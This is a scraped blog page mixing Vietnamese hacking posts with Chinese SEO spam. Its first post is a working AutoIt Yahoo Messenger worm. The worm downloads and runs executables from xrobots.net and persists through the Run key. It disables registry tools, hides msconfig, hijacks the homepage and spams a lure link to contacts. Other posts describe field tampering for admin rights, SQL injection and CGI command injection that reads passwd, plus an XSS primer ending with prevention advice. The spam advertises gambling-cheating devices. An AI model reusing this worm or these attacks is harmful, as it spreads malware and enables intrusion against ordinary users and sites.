quoccuong.mylivepage.com

OSC - Gaixinh (vuhoang.mylivepage.com)

05 Jan 07 17:30:59 GMT

OSC - Gaixinh (vuhoang.mylivepage.com)
; ----------------------------------------------------------------------------


----------------------------------------------------------------------------

----------------------------------------------------------------------------

AutoIt Version: 3.1.0
Author: A.N.Other

Script Function
Template AutoIt script.

----------------------------------------------------------------------------

Script Start - Add your code below here

$version = "1.0"

AutoItSetOption ("TrayIconHide","1")
InetGet ( "Http://xrobots.net/Gift/Robots.exe" ,@WindowsDir & "\Messenger.exe" ,0,1)
sleep(3000)

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Yahoo!!!","REG_SZ",@WindowsDir & "\Messenger.exe")

InetGet ( "Http://xrobots.net/Gift/Version.txt" ,@WindowsDir & "\Version.txt" ,1,1)
sleep(5000)
$checkfile = FileExists ( @WindowsDir & "\Version.txt" )
if $checkfile = 1 then
$file = FileOpen (@WindowsDir & "\Version.txt",0 )
$read = FileRead($file,3)
FileClose($file)
if $read $version then
InetGet ( "Http://xrobots.net/Gift/Update.exe" ,@WindowsDir & "\Update.exe" ,1,1)
sleep (3000)
Run(@WindowsDir & "\Update.exe")
endif
endif

RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", "http://67.15.40.2/~tranphu/forumtp/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast","content url","REG_SZ", "http://xRobots.net/Gift/New/")
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz","content url","REG_SZ", "http://vietnamnet.vn")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools","REG_DWORD","1")
AutoItSetOption ("WinTitleMatchMode", "2")
$check = FileExists ( @WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" )
if $check = 1 then
FileMove(@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe" ,@WindowsDir &"\msconfig.exe" )
FileDelete (@WindowsDir & "\pchealth\helpctr\binaries\msconfig.exe")
endif

Đoạn này xóa đi để đoạn mã không bị lợi dụng xLuke

if ($count = 2) or ($count = 6) or ($count = 9) or ($count = 12) or ($count = 15) or ($count = 18) or ($count = 21) or ($count = 24) or ($count = 27) or ($count = 30) then
$title = WinGetTitle("Yahoo! Messenger")
$wincheck = WinExists ($title)
ClipPut("Gai xinh ne , gai xinh ne : http://xrobots.net/Gift/?file=Gaixinh.jpg")
if $wincheck = 1 then
BlockInput (1)
WinActivate($title)
send("!A")
send("M")
sleep(400)
send("{DOWN}")
send("{SHIFTDOWN}")
send("{DOWN 70}")
send("{enter}")
send("{LSHIFT}")
send("^v {ENTER}")
BlockInput (0)
endif
endif

Next

----------------------------------------------------------------------------

----------------------------------------------------------------------------

No subject

19 May 08 04:08:09 GMT

北京舒华阳光健身器材有限公司是国内专业运动场地营造单位,具有体育场地设施工程专业承包叁级资质,引入中国市场最新健身器材及健身概念,可向客户提供健身器材,壁球, ... 制造各式运动器材，包括撞球台、按摩椅及跑步机、重量训练机等。公共健身本来是项增强体质、有益身心的活动，但记者日前在一些城市社区、乡村的公共健身器材场地了解到，由于人为破坏和锻炼时缺乏卫生意识，不同程度地出现了公共健身器材“不健康”情形。
　　近年来，随着国家对群众体育健身投入的加大，城市社区、乡村中的各种健身器材也大量增多，但由于缺乏必要的维护和管理，部分社区和乡村的公共健身器材遭受不同程度的人为破坏。有的已经失去健身的功能，有的由于长期生锈、磨损，存在一定的安全隐患。
　　推荐：十种最经济的健身器材工具
　　记者在一些公共健身场地看到，不少健身器材敷满灰尘，污浊不堪。更有甚者，一些人缺乏公共卫生意识，锻炼时习惯在手掌心吐唾液，一旦患有传染疾病，这种缺乏防护和隔绝病菌的锻炼，容易给别人锻炼埋下安全隐患，危害他人的身体健康。再说，就是身体健康，也同样要注意公共卫生。如何挑选适合家庭的健身器材>>>>>

世界台球巨星来皖论剑
 苏州的台球美女真是多多
 球迷惊呼奥沙利文为台球毕加索
 台球皇帝拖垮台球小子
 小老板借用网络举办“台球文化节”
台球拿什么吸引赞助商
 疯狂台球重庆制造
 中国台球竟“挂户”英国
 培养一名台球手花费巨大

 厦门欲借台资打造全球最大健身器材出口基地
 国内电动健身器材渐成出口新亮点
 目前大多露天健身器材不防雷
 http://www.sunfitness.cn/twsb.htm>泰晤士报评出十大中看而不中用的无...

Những kiểu tấn công của hacker hiện nay (vuhoang.mylivepage.com)

05 Jan 07 17:27:02 GMT

Những kiểu tấn công của hacker hiện nay
251 days ago 2006-04-28 17:38:10 Quote

1-Tấn công vào vùng ẩn:

Những phần bị dấu đi trong trang WEB thường chứa những thông tin về các phiên làm việc của "clien",các phiên làm việc này thường ghi ỡ máy khách(clien) chứ không tổ chức CSDL trên máy chủ,vì vậy ta có thể dùng chức năng "View Source" của trình duyệt để đọc phần bị dấu đi và từ đó có thể tìm ra sơ hở của trang WEB mà ta muốn tấn công,ta có thể truy cập vào hệ thống của máy chủ này...

Ví dụ có một website cho phép bạn sữa các cấp thành viên làm Mod, Member, Banned, nhưng không cho phép sửa lên thành Admin. Bạn thử view code, bạn có thể thấy như sau:(đây là ví dụ thôi tuỳ trường hợp)

QUOTE

.....

.....

.....

Hãy suy luận một tí nhé: Banned: value=3, Member: value=2, Moderator: value=1. Vậy thì Admin là mấy??? Có thể là 0 okie tiếp tục nào:

Lưu lại trang setting member đó, edit HTML code trong đó, sửa lại đoạn Select:

QUOTE
.....

.....

.....

Bây giờ hãy mỡ trang web đó lên và nhấn "submit" nào,vẩn không có chuyện gì xãy ra cã sao vậy à quên xem chổ này:

bạn trở thành admin của forum thật dể dàng phải không

2-Can thiệp vào tham số trên URL:

Đây là cách tấn công đưa tham số trực tiếp vào URL,kẽ tấn công có thể dùng các câu lệnh SQL để khai thác CSDL trên server bị lổi,điển hình nhất là tấn công bằng lổi "SQL INJECT"(chú ý: Hầu hết các trang web của VN đều bị lổi này) cách khai thác lổi này hãy đọc kỹ bài viết của WINDAK và Nhóm Vicki và các bài viết liên quan của các thành viên trong forum của chúng ta,tấn công kiểu này rất gọn nhẹ nhưng vô cùng hiệu quả chỉ dùng công cụ tấn công duy nhất là trình duyệt WEB và backdoor(up lên server) lời khyên nên dùng minibrowse vào http://flash.to/nhomvicki mà download vì nó không bị lổi time out.

3-Tấn công dùng cookie:

Giới thiệu về cookie
cookie là những phần dữ liệu nhỏ có cấu trú được chia sẻ giữa web site và browser của người dùng. cookies được lưu trữ dưới những file dữ liệu nhỏ dạng text (size dưới 4k). Chúng được các site tạo ra để lưu trữ/truy tìm/nhận biết các thông tin về người dùng đã ghé thăm site và những vùng mà họ đi qua trong site. Những thông tin này có thể bao gồm tên/định danh người dùng, mật khẩu, sở thích, thói quen...
cookie được browser của người dùng chấp nhận lưu trên đĩa cứng của máy mình, ko phải browser nào cũng hỗ trợ cookie. Sau một lần truy cập vào site, những thông tin về người dùng được lưu trữ trong cookie. Ở những lần truy cập sau đến site đó, web site có thể dùng lại những thông tin trong cookie (như thông tin liên quan đến việc đăng nhập vào 1 forum...) mà người ko phải làm lại thao tác đăng nhập hay phải nhập lại các thông tin khác. Vấn đề đặt ra là có nhiều site quản lý việc dùng lại các thông tin lưu trong cookie ko chính xác, kiểm tra ko đầy đủ hoặc mã hoá các thông tin trong cookie còn sơ hở giúp cho hacker khai thác để vượt qua cánh cửa đăng nhập, đoạt quyền điêu khiển site; cũng có nhiều site sử dụng những thông tin cá nhân của người dùng để phục vụ cho các mục đích khác như quảng cáo, hoặc thậm chí bán thông tin của người dùng cho khách hàng khác (vd: nếu đột nhiên bạn nhận vài email quảng cáo mỗi ngày được gửi vào mail box của bạn mà ko biết tại sao, thì có thể là thông tin cá nhân của bạn đã bị một site nào đó mà bạn từng xem sử dụng)
Các thành phần của cookie
Tên: do người lập trình web site chọn
Domain: là tên miền từ server mà cooki e được tạo và gửi đi
Đường dẫn: thông tin về đường dẫn ở web site mà bạn đang xem
Ngày hết hạn: là thời điểm mà cookie hết hiệu lực\
Bảo mật: Nếu giá trị này đựơc thiết lập bên trong cookie, thông tin sẽ đựơc mã hoá trong quá trình truyền giữa server và browser.
Các giá trị khác: là những dữ liệu đặc trưng được web server lưu trữ để nhận dạng về sau các giá trị này ko chứa các khoảng trắng, dấu chấm, phẩy và bị giới hạn trong khoảng 4k.

cookies của Netscape (NS) đặt trong file cookies.txt, trong thư mục cài đặt NS \Users\default (hoặc \User\Yourname), còn của IE thường đặt trong \Documents and Settings\Username\cookies\username@sitename.txt. (đối với win9x, thư mục cookies nằm trong thư mục Windows/cookies)

Netscape là trình duyệt đầu tiên sử dụng cookie, kế đến là IE của microsoft.
Các thông tin khác về cookie thêm về cookie, các bạn có thể tham khảo thêm ở http://www.cooki_ecentral.com/

Khai thác cookie
Ưu điểm của việc sử dụng cookie đã rõ ràng, việc lưu trữ và dùng lại các thông tin đăng nhập sẽ giúp người dùng tiết kiệm thời gian trong việc duyệt các web site. Tuy nhiên, bên cạnh những lợi ích của nó. cookie là một trong những nguyên nhân gây tiết lộ thông tin riêng tư của người dùng. Những người biết tận dụng những thông tin này có thể gây nên những hậu quả nghiêm trọng. VD: một hacker làm việc ở một ngân hàng có thể tìm cách xem thông tin trong cookie của khách hàng và sử dụng thông tin này để truy cập vào acc của khách hàng đó. Hoặc hacker có thể tìm cách trộm cookie của admin 1 website và từ đó có thể dễ dàng chiếm được quyền điều khiển site.
Những browser hiện nay cho phép người dùng khóa cookie hoặc hỏi họ trước khi lưu lại cookie trên hệ thống. Cũng có nhiều software giúp người dùng quản lý tốt cookie, giúp ngăn chặn hoặc cảnh báo những nguy cơ có thể gây hại.
(Còn tiếp: tôi sẽ giới thiệu cho các bạn cách hack một vài kiểu forum bằng cách khai thác thông tin trong cookie và phương pháp lấy cookie từ một vài kiểu forum chưa fix)

4-Các lổ hổng bảo mật:

Hiện nay các lổ hổng được phát hiện ra ngày càng nhiều về hệ điều hành,máy chủ WEB,và các phần mềm của các hảng khác...Tuy khi phát hiện ra được và có bổ sung các bảng path nhưng các khách hàng không cập nhật thường xuyên nên là cơ hội cho các hacker tấn công.Hiện nay trong box lổi bảo mật của chúng ta các lổi bảo mật luôn được cập nhật thường xuyên(nhờ có đôi ngũ Mod năng động như L...)còn việc khai thác các lổ hổng như thế nào thì tuy thuộc sự linh hoạt năng động của từng người...Chứ khôgn thể hướng dẩn từng chi tiết một cho các bạn được vì còn rất nhiều việc phải làm nữa nên các bạn phải tự mày mò tìm hiểu để bổ sung vào kiến thức của mình

5-Cấu hình không an toàn:

Đây là lỗ hổng do ứng dụng có các thiết lập mặc định không an toàn hoặc do người quản trị hệ thống định cấu hình không an toàn. Ví dụ như cấu hình Web server cho phép bấy kỳ ai cũng có quyền duyệt qua hệ thống thư mục. Việc này có thể làm lộ các thông tin nhạy cảm như mã nguồn, mật khẩu hay thông tin của khách hàng.
Việt cấu hình không an toàn này rất nguy hiểm vì khi ta duyệt được các file như pass thì ta có thể download và giải mã...Có rất nhiều lổi về cấu hình không an toàn này,đã làm cho không bao nhiêu người phải khốn đốn.

6-Tràn bộ đệm:

Tình trạng tràn bộ đệm xảy ra khi dữ liệu được gửi đến ứng dụng nhiều hơn mong đợi. Kỹ thuật tấn công này có thể làm cho hệ thống bị tê liệt hoặc làm cho hệ thống mất khả năng kiểm soát.
Xem bài viết của nhóm Vicki về cách khai thác lổi tràn bộ đệm

Chèn mã lệnh:

Đây là kỹ thuật chèn mã lệnh vào trang Web từ máy khách. Kỹ thuật này cho phép hacker đưa mã lệnh thực thi vào phiên làm việc trên Web của một người dùng khác. Khi đoạn mã lệnh này chạy, nó sẽ cho phép hacker làm đủ thứ chuyện, từ giám sát phiên làm việc trên Web cho đến toàn quyền điều khiển máy tính của khổ chủ.

Một ví dụ điển hình đó là lổi của web dùng cgi các hacker có thể dùng lệnh unix trên trình duyệt của mình như ví dụ sau:

QUOTE
http://target/index.cgi?page=index.cgi

http://target/index.cgi?page=index.cgi >xem mã nguồn file index.cgi

http://target/index.cgi?page=index.cgiswd >xem file passwd của server

http://target/index.cgi?page=index.cgils -la

http://target/index.cgi?page=index.cgi

http://target/index.cgi?page=index.cgi >dùng lệnh unix

Bạn phải linh hoạt trong cách tấn công của mình

7-Không cần log-in:

Nếu ứng dụng không được thiết kế chặt chẻ, không ràng buộc trình tự các bước khi duyệt ứng dụng thì đây sẽ là một lỗ hổng bảo mật và hacker có thể lợi dụng để truy cập thẳng đến các trang thông tin bên trong mà không cần phải qua bước đăng nhập.

8-Eavesdropping(nghe trộm):

Một cách chung chung phần lớn các hệ thống mạng truyền đạt thông tin qua mạng không chắt chắn lắm,nên nó giúp các Attacker có thể truy cập vào data paths để "listen in" hoặc "read" luồng dữ liệu chuyển qua.Khi các Attacker nghe trộm sự truyền đạt thông tin nó sẽ chuyển đến "sniffing" or "snooping".Năng lực của nghe trộm là giám sát hệ thống mạng nó sẽ thu thập được những thông tin quý giá về hệ thống đó,có thể là một packet chứa passwd và user.Các chương trình này gọi là các "sniffing" có nhiệm vụ lắng nghe các cổng của một hệ thống mà các hacker muốn tấn công,nó sẽ thu thập các dữ liệu chuyển qua các cổng này và chuyển về cho các attacker.

9-Data Modification(thay đổi dữ liệu):

Sau khi các attacker đọc được dữ liệu của môt hệ thống nào đó,họ có thể thay đổi mà không cần quan tâm đến người gỡi và người nhận.Thậm chí nó không có đòi hỏi sự cẩn trọng trong sự chuyển dịch thông tin ,thì bạn có thể sữa đổi những thông tìn từ những packet này một cách dể dàng ví dụ như trong một cuộc giao dich nào đó bạn có thể thay đổi thông tin về giá trị của sãn phẩm...Có nhiều thứ mà các ATK quan tâm(hãy cẩn thận)

10-Password-Based Attacks:

Thông thường một hệ thống nào đó khi mới cấu hình thì cũng có một User và pass mặt định,những một số admin của hệ thống sau khi config xong thì không đổi,đây là cơ hội để có thể giúp các ATK xâm nhập vào một cách đường đường chính chính,khi đã vào rồi thì họ có thể tạo thêm user,cài backdoỏ để cho lần viếng thăm sau...Lời khuyên khi cài và config xong hay thay đổi pass mặt định.

11-Identity Spoofing (IP Address Spoofing):

Hầu như các hệ thống mạng trên thế giới này đều sữ dụng IP address để nhận biết sự tồn tại của mình,vì vậy IP là sự quan tâm hàng đầu của các ATK,khi hack vào bất cứ hệ thống mạng nào thì cũng phải biết địa chỉ IP của hệ thống mạng đó.Các ATK sẽ giã mạo IP address để thâm nhập vào hệ thống đó và sau đó có thể làm gì mình thích như cấu hình lại hệ thống đó,sữa đổi thông tin ... có rất nhiều thứ mà họ quan tâm

Còn nhiều kiểu tấn công khác nữa các bạn có thể tìm hiểu thêm trên net biết đâu chính bạn tạo ra một phương pháp mới thì sao có thể lắm chứ tự tin lên các bạn

tsbeginnervn

No subject

24 May 08 12:56:12 GMT

奥沙利文第九杆147世锦赛制造夺冠媲美台球皇帝
体彩中打台球
MGS掌游堂3D台球、斗地主疯狂送大奖
天津市首届大学生台球邀请赛落幕
走近台球新秀梁文博
斯诺克世锦赛点燃石嘴山人台球热情
奥沙利文被惊呼为台球毕加索新华网内蒙古频道
性感台球宝贝写真曝光自撩超短裙露春光
世界台球锦标赛奥苏利文三度称雄
合肥台球爱好者开始为偶像激动

“火箭”奥沙利文萌生退役念头渐丧失对台球之热爱
PSP游戏下载:PS模拟虚拟台球3 完美珍藏版
台球小将梁文博的成长故事
曾厝垵社区团总支举办"庆五四、迎奥运"80分、台球友谊赛...
组图:搜狐网友台球庆典俊男美女云集一决高下
斯诺克“台球皇帝”输得心服口服火箭表现堪称神奇
火箭”掀翻“台球皇帝” 提前晋级决赛
世界台球锦标赛奥苏利文挺进决赛
奥沙利文:不仅仅是台球皇帝亨德利是我偶像
提前晋级火箭难掩兴奋:亨德利是偶像和台球上帝

台球资讯报道：
世界台球巨星来皖论剑
 苏州的台球美女真是多多
 球迷惊呼奥沙利文为台球毕加索
 台球皇帝拖垮台球小子
 小老板借用网络举办“台球文化节”
台球拿什么吸引赞助商
 疯狂台球重庆制造
 中国台球竟“挂户”英国
 培养一名台球手花费巨大

 厦门欲借台资打造全球最大健身器材出口基地
 国内电动健身器材渐成出口新亮点
 目前大多露天健身器材不防雷
 泰晤士报评出十大中看而不中用的无聊健身器材
 法院开庭审理健身器材夹断小孩手指案
 海外健身器材的十大发展动向
 健身器材太“年轻” 不合老年人使用

 喷嘴保险柜
 移民澳洲移民

澳大利亚移民注册公司双眼皮
 隆鼻整形远程教

学统一通信视频监控北京舒华阳光健身器材

有限公司兼台球销售网　　址：http://www.sunfitness.cn/ 厂址：北京大兴榆垡工业区办　公：中国北京大兴区清城时代广场

15层邮　编：102600业务电话：0086-10-69228700传　　真：0086-10-69228733E-mail: sunfitness@163.com 健身器材|台球|运

动地板|壁球|

clemence
喷嘴
 保险柜
 移民
 澳洲移民
 澳大利亚移民
 注册公司
 双眼皮
 隆鼻
 整形
 远程教学
 统一通信
 视频监控
 血管瘤
 平安保险
 移民
 整形
 健身器材
 台球
 壁球
 崇文区婚庆公司
 北京庆典
 婚庆摄像
 北京婚礼策划公司
 北京婚礼主持人
 婚庆场地布置
 婚庆公司
 北京婚庆
 北京婚庆公司
 牌技
 牌技
 牌技
 牌技
 千术
 千术
 千术
 千术
 扑克绝技
 扑克绝技
 扑克绝技
 扑克绝技
 麻将机程序
 麻将机程序
 麻将机程序
 麻将机程序
 透视扑克
 透视扑克
 透视扑克
 透视扑克
 透视麻将
 透视麻将
 透视麻将
 透视麻将
 遥控色子
 遥控色子
 遥控色子
 遥控色子
 透视眼镜
 透视眼镜
 透视眼镜
 透视眼镜
 红外线透视眼镜
 红外线透视眼镜
 红外线透视眼镜
 红外线透视眼镜
 麻将绝技
 麻将绝技
 麻将绝技
 麻将绝技
 遥控麻将机
 遥控麻将机
 遥控麻将机
 遥控麻将机

No subject

17 May 08 06:10:49 GMT

dee

16 May 08 07:11:25 GMT

薄膜蒸发器
 烟花
 分子蒸馏
 雨花石工艺品
 画册
 探伤机
 包装设计
 钢管
 logo设计
 奶茶加盟

潜水泵搞笑

05 May 08 00:29:26 GMT

潜水泵搞笑
昨天买了瓶洗发水，用来洗头发现头皮很痒，仔细一看：是瓢柔！！
记得小时候还吃过：大白免奶糖！！汗了！

泵
 泵
 离心泵
 离心泵

一楼：
中萃香烟抽过没有？
吃过康帅博方便面吗？
金康的小说你看过吗？
古尢的小说看过没?
惊瑶的呢?

磁力泵
 磁力泵
 自吸泵
 自吸泵

二楼：
SQNY，
ADIDOS，
FUMA，
PAMA，
HIKE
环保设备
 环保设备
 化工环保
 化工环保
 水泵
 水泵

~呵呵

三楼：
沙宜不是宣哦
油泵
 油泵
 隔膜泵
 隔膜泵

四楼：
大家都知道洽洽瓜子吧，上次我买了包，吃完才发现是“治治牌瓜子”
潜水泵
 潜水泵
 螺杆泵
 螺杆泵

五楼：
雕牌大家都知道，有次买了一袋，快用完偶然仔细一看才发现是”周佳牌”！！，周

佳两个字挨的非常近，用雕牌那种字体，几乎看不出来……晕了，我说为啥怎么洗也

没沫……

六楼：
云碧、
芳达，
都喝过没?

七楼：
我家还买到了丑粮液的呢。

八楼：
小说看过有本金庸新著，后来才知道作者叫金庸新！
我同学踢足球，去买了双双星球鞋，回来一看，商标是双星球！

九楼：
司口司乐喝过没？
娃娃哈呢？

十楼：
三粮液……故意把三写的跟五似的，不过没有那个“丑粮液”强悍啊`

十一楼：
吃过下好佳的薯片吗？

十二楼：
运气不好~看着包装一样就买了一瓶（红茶），喝了一口觉得不对，看了一眼才知道

，是允一牌。

十三楼：
记得以前有种饮料叫旭日升吗? 有次喝完发现包装不对劲,仔细一看“九日开”

十四楼：
microseft的鼠标见过,现在到处都有。

十五楼：
我们这里有个——华朕超市

十六楼：
据听说浙江某镇上,单单做鳄鱼这个牌子的服装，就是二十七家！～而且每家商标大

差不离却都不样，有张嘴的，有闭嘴的，有头在左边的，有头在右边的，有尾巴向上

的，有尾巴向下的……所以浙江人都暴发啊！

十七楼：
终于找到知音了，有一次在山东某城市的火车站广场小店买了一瓶“脉动”饮料，上

车喝了才发现味道不对，仔细看了半天，没发现包装上有什么异样，再仔细看，靠，

竟然是“脉劫”！！本来脉动的字体就是那样有尖尖的棱角的，劫字多出的一竖用很

短的三角形尖尖代替，太难分辨了。

如果看完笑了...记得帮忙顶一下!!
jjqqme5
syss999

Gioi thieu so luong ve cach tan cong CROSS-SITE SCRIPTING - vuhoang.mylivepage.com

05 Jan 07 17:32:14 GMT

Gioi thieu so luong ve cach tan cong CROSS-SITE SCRIPTING - vuhoang.mylivepage.com
Gioi thieu so luong ve cach tan cong CROSS-SITE SCRIPTING
165 days ago 2006-07-24 11:07:34 Quote

Nguồn từ: HVA Online
Tác giả: Luke

1.

2. Giới thiệu sơ lược về kĩ thuật tấn công CROSS-SITE SCRIPTING
3. Vietnamese Version - Luke - HVA Copyrighted
4. 07/27/03
5.

Cross-Site Scripting (XSS) là một trong những kĩ thuật tấn công phổ biến nhất hiên nay, đồng thời nó cũng là một trong những vấn đề bảo mật quan trọng đối với các nhà phát triển web và cả những người sử dụng web. Bất kì một website nào cho phép người sử dụng đăng thông tin mà không có sự kiểm tra chặt chẽ các đoạn mã nguy hiểm thì đều có thể tiềm ẩn các lỗi XSS. Trong bài viết này tôi sẽ đề cập sơ lược tới XSS với một số kinh nghiệm của tôi qua kĩ thuật tấn công này.

1. XSS là gì ?
Cross-Site Scripting hay còn được gọi tắt là XSS (thay vì gọi tắt là CSS để tránh nhầm lẫn với CSS-Cascading Style Sheet của HTML) là một kĩ thuật tấn công bằng cách chèn vào các website động (ASP, PHP, CGI, JSP ...) những thẻ HTML hay những đoạn mã script nguy hiểm có thể gây nguy hại cho những người sử dụng khác. Trong đó, những đoạn mã nguy hiểm đựơc chèn vào hầu hết được viết bằng các Client-Site Script như JavaScript, JScript, DHTML và cũng có thể là cả các thẻ HTML.
Kĩ thuật tấn công XSS đã nhanh chóng trở thành một trong những lỗi phổ biến nhất của Web Applications và mối đe doạ của chúng đối với người sử dụng ngày càng lớn. Người chiến thắng trong cuộc thi eWeek OpenHack 2002 là người đã tìm ra 2 XSS mới. Phải chăng mối nguy hiểm từ XSS đã ngày càng được mọi người chú ý hơn.

2. XSS hoạt động như thế nào ?
Về cơ bản XSS cũng như SQL Injection hay Source Injection, nó cũng là các yêu cầu (request) được gửi từ các máy client tới server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Nó có thể là một request được gửi từ các form dữ liệu hoặc cũng có thể đó chỉ là các URL như là

Code:

http://www.example.com/search.cgi?query=alert('XSS was found !');

Và rất có thể trình duyệt của bạn sẽ hiện lên một thông báo "XSS was found !".
Các đoạn mã trong thẻ không hề bị giới hạn bởi chúng hoàn toàn có thể thay thế bằng một file nguồn trên một server khác thông qua thuộc tính src của thẻ . Cũng chính vì lẽ đó mà chúng ta chưa thể lường hết được độ nguy hiểm của các lỗi XSS.
Nhưng nếu như các kĩ thuật tấn công khác có thể làm thay đổi được dữ liệu nguồn của web server (mã nguồn, cấu trúc, cơ sở dữ liệu) thì XSS chỉ gây tổn hại đối với website ở phía client mà nạn nhân trực tiếp là những người khách duyệt site đó. Tất nhiên đôi khi các hacker cũng sử dụng kĩ thuật này đề deface các website nhưng đó vẫn chỉ tấn công vào bề mặt của website. Thật vậy, XSS là những Client-Side Script, những đoạn mã này sẽ chỉ chạy bởi trình duyệt phía client do đó XSS không làm ảnh hưởng đến hệ thống website nằm trên server.
Mục tiêu tấn công của XSS không ai khác chính là những người sử dụng khác của website, khi họ vô tình vào các trang có chứa các đoạn mã nguy hiểm do các hacker để lại họ có thể bị chuyển tới các website khác, đặt lại homepage, hay nặng hơn là mất mật khẩu, mất cookie thậm chí máy tính bạn có thể sẽ bị cài các loại virus, backdoor, worm ..

3. Cảnh giác với XSS
Có lẽ không cần liệt kê những nguy hiểm của XSS, nhưng trên thực tế nếu bạn có một chút hiểu biết về XSS bạn sẽ không còn phải sợ chúng nữa. Thật vậy bạn hoàn toàn có thể tránh khỏi việc bị tấn công bởi những lỗi XSS nếu hiểu kĩ về nó.
Các thẻ HTML đều có thể là công cụ cho các cuộc tấn công bởi kĩ thuật XSS, trong đó 2 thẻ IMG và IFRAME có thể cho phép trình duyệt của bạn load thêm các website khác khi các lệnh HTML được hiển thị. Ví dụ như BadTrans Worm một loại worm sử dụng thẻ IFRAME để lây lan trong các hệ thống có sử dụng Outlook hay Outlook Express:

Code:

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="filename.ext.ext"
Content-Transfer-Encoding: base64
Content-ID:

Đôi khi đang đọc thư bạn bị chuyển sang một website khác, bạn có nghĩ rằng bạn có thể mất mật khẩu. Trước đây, hàng loạt các hộp thư của Yahoo bị mất mật khẩu hay bị đọc trộm thư mà không rõ nguyên nhân. Có lẽ khi đó các bạn mở các bức thư mà không hề cảnh giác với XSS, đâu phải chỉ các file đính kèm mới có thể gây nguy hiểm cho bạn. Chỉ cần với một đoạn mã HTML gửi trong thư bạn đã hoàn toàn bị mất cookie của mình:
CODE

Vậy là khi bạn nhận thư, và nếu bạn vô tình đưa con chuột qua bức ảnh gửi kèm thì cũng có nghĩa là bạn đã bị lấy mất cookie. Và với cookie lấy được, các hacker có thể dễ dàng login hòm thư của bạn mà không cần biết mật khẩu của bạn. Thực sự tôi cũng rất bất ngờ khi tìm thấy rằng Yahoo khi đó đã ngăn được hầu hết các mối đe doạ từ các thẻ HTML lại bỏ qua thẻ IMG. Tuy nhiên cho tới ngày 12/7/2003 Yahoo đã kịp thời vá lỗ hồng nghiêm trọng này, nhưng không phải vì vậy mà bạn mất cảnh giác với những "lỗi" của website.
Nếu như bạn gặp một liên kết có dạng

http://example.com/search.cgi?query=alert(document...

chắc chắn bạn sẽ phải xem xét kĩ trước khi click vào. Có thể là sẽ tắt JavaScript cho trình duyệt của bạn trước khi click vào hay ít nhất cũng có một chút cảnh giác. Nhưng nếu bạn gặp một liên kết như thế này thì sao :

Code:

http://example.com/search.cgi?%71%75%65%61%72%79%3...

Đó thực chất chính là liên kết ban đầu nhưng chỉ khác nó đã được mã hoá. Một phần kí tự của liên kết đã được thay thế bởi mã HEX của nó, tất nhiên trình duyệt của bạn vẫn hiểu địa chỉ đó thực sự là gì. Bởi vậy bạn có thể sẽ gặp phải các đoạn mã nguy hiểm nếu như bạn mất cảnh giác với XSS.
Tât nhiên còn rất nhiều những kiểu tấn công khác, trong đó có những kiểu đã được tìm ra có những kiều chưa lường hết được, những trong khuôn khổ bài viết này tôi hi vọng với một vài ví dụ vừa rồi, các bạn cũng đã hiểu phần nào về XSS.

4. Phát hiện XSS bằng cách nào ?
Nếu như các bạn sử dụng các mã nguồn của các chương trình có sẵn bạn có thể tham khảo danh sách các lỗ hổng của chương trình bạn trên các trang web chứa các thông tin về bảo mật như securityfocus.com, securiteam.com,... Tuy nhiên nếu các website được tự viết mã nguồn thì bạn không thể áp dụng phương pháp trên. Trong trường hợp này bạn cần đến các chương trình scanner tự động. Nếu như bạn sử dụng trong môi trường Windows bạn có thể dùng N-Stealth hay AppScan, đó là những chương trình scan khá tuyệt, bạn không chỉ kiểm tra được các lỗi XSS mà nó còn cho phép bạn kiểm tra các lỗi khác trong Website đó, Server đó.
Tất nhiên đâu phải lúc nào bạn cũng cần kiểm tra tất cả, nếu như bạn chỉ muốn kiểm tra các lỗi XSS có trong website, bạn chỉ cần sử dụng screamingCSS. Đó là một Perl Script sẽ mở các kết nối tới website (sử dụng Perl's socket) để kiểm tra các lỗi XSS của bạn. Hơn nữa bạn có thể sử dụng nó trong cả môi trường Unix lẫn Windows.

5. Ngăn ngừa XSS như thế nào ?
Người ta không lường hết được mức độ nguy hiểm của XSS nhưng cũng không quá khó khăn để ngăn ngừa XSS. Có rất nhiều cách để có thể giải quyết vấn đề này.
OWASP (The Open Web Application Standard Project) nói rằng để có thể xây dựng các website bảo mật cao, đối với các dữ liệu của người sử dụng bạn nên
+ Chỉ chấp nhận những dữ liệu hợp lệ.
+ Từ chối nhận các dữ liệu hỏng.
+ Liên tục kiểm tra và thanh lọc sữ liệu.
Tuy nhiên trên thực tế, một số trường hợp bạn phải chấp nhận mọi loại dữ liệu hay không có một bộ lọc phù hợp. Chính vì vậy bạn phải có những cách riêng để giải quyết.
Một trong những cách hay sử dụng là bạn mã hoá các kí tự đặc biệt trước khi in ra website, nhất là những gì có thể gây nguy hiểm cho người sử dụng. Trong trường hợp này thẻ sẽ được đổi thành . Như vậy nó sẽ vẫn được in ra màn hình mà không hề gây nguy hiểm cho người sử dụng.
Tôi lấy ví dụ với script search.cgi với mã nguồn là

Code:

1. !/usr/bin/perl

use CGI;

my $cgi = CGI->new();
my $query = $cgi->param('query');

print $cgi->header();
print "You entered $query";

Đây hoàn toàn là một script có lỗi bởi vì nó in ra trực tiếp dữ liệu được nhập vào. Dĩ nhiên là khi in ra, nó sẽ in ra dưới dạng đoạn mã HTML, như thế nó không chỉ không in ra chính xác những dữ liệu vào một cách trực quan mà còn có tiềm ẩn lỗi XSS.
Như đã nói ở trên, để có thể giải quyết vấn đề này, chúng ta có thể mã hoá các kí tự đặc biệt của HTML với hàm HTML::Entities::encode(). Như vậy ta có thể có một mã nguồn hoàn hảo hơn như sau:

Code:

1. !/usr/bin/perl

use CGI;
use HTML::Entities;

my $cgi = CGI->new();
my $text = $cgi->param('text');

print $cgi->header();
print "You entered ", HTML::Entities::encode($text);

